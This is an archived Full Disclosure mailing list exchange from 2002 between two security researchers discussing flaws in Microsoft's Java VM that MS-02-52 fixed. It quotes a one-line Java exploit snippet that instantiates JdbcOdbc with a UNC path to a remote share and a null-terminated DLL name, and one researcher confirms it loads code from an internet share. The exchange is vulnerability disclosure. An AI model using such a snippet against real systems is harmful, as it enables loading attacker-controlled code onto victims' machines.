Full Disclosure mailing list archives
Technical information about the vulnerabilities fixed by MS-02-52
From: guninski () guninski com (Georgi Guninski)
Date: Mon, 23 Sep 2002 19:43:57 +0300
Jouko Pynnonen wrote:
On Mon, 23 Sep 2002, Georgi Guninski wrote:Does new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000"); work?Yes, seems to work, so there's another way to exploit this one. It requires that browsing internet shares works, which may limit the systems where it can be exploited. Although there were other Java vulnerabilities involving the use of shares, I never came to think about this way. MS may have thought of this, but of course they don't mention this kind of things during the "co-operation".
Hehehehe - you don't expect microsoft to share info with you during "co-operation", do you?
Current thread:
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Jouko Pynnonen (Sep 23)
- Technical information about the vulnerabilities fixed by MS-02-52 Georgi Guninski (Sep 23)